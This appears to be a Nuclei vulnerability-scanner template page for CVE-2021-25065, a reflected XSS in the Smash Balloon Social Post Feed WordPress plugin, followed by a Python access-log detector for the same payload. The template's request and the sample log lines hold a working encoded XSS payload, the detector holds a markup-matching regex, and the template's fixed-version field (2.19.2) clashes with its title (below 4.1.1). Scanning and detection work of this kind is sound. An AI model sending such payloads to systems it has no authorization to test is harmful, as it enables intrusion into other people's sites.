Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting
ID: CVE-2021-25065
Severity: medium
Author: Harsh
Tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon
Description
The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
YAML Source
id: CVE-2021-25065

info:
  name: Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
  impact: |
    An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 2.19.2
  reference:
    - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc
    - https://wordpress.org/plugins/custom-facebook-feed/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-25065
    cwe-id: CWE-79
    epss-score: 0.00069
    epss-percentile: 0.29862
    cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: smashballoon
    product: smash_balloon_social_post_feed
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/custom-facebook-feed/
    fofa-query: body=/wp-content/plugins/custom-facebook-feed/
    publicwww-query: "/wp-content/plugins/custom-facebook-feed/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<img src onerror=alert(document.domain)>")'
          - 'contains(body_2, "custom-facebook-feed")'
        condition: and
# digest: 4a0a00473045022100afea8694fa0b865d42775b3cb2e2bf2df019ce9a5b2954bd790daf75ee04c3e602204a3e1a6d2205c6931bc9443a0111d442c8699550143876615f14dd12e004c07f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25065.yaml"
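The template above only confirms the bug from the scanner's side. As an added defender-side illustration (not part of the Nuclei template or the plugin), the snippet below scans web server access logs for requests to the cff-top admin page whose cff_access_token parameter carries HTML or script markup instead of an opaque token; the log lines are constructed sample data, and the regexes are assumptions, not plugin code.

```python
"""Access-log detection for the cff-top reflected XSS on this page.

Added illustration, not part of the Nuclei template or the plugin.
A legitimate Facebook access token is an opaque string; any '<', '>'
or on*= handler in cff_access_token on the cff-top page is worth an
alert. The log lines below are constructed sample data.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Combined Log Format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /wp-admin/admin.php?page=cff-top&cff_access_token=EAAGm0PX4ZCpsBAOZC5&cff_final_response=true HTTP/1.1" 200 5120
10.0.0.9 - - [12/Jan/2022:10:02:15 +0000] "GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1" 200 5133
10.0.0.7 - - [12/Jan/2022:10:03:40 +0000] "GET /wp-admin/admin.php?page=cff-top HTTP/1.1" 200 4990
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup that has no business inside an access token (assumed heuristic).
MARKUP_RE = re.compile(r"<|>|javascript:|on\w+\s*=", re.IGNORECASE)


def is_suspicious(target: str) -> bool:
    """True when the request hits cff-top with a tainted cff_access_token."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("page") != ["cff-top"]:
        return False
    # parse_qs already decodes once; decode again to catch double encoding.
    for value in params.get("cff_access_token", []):
        if MARKUP_RE.search(unquote(value)):
            return True
    return False


def scan_log(text: str) -> list[str]:
    """Return the client IPs of log lines carrying a suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group("target")):
            hits.append(line.split(" ", 1)[0])
    return hits
```

Run against the sample, only the second line (the encoded payload from the template's GET request) is reported; the plain token and the parameterless page load are ignored.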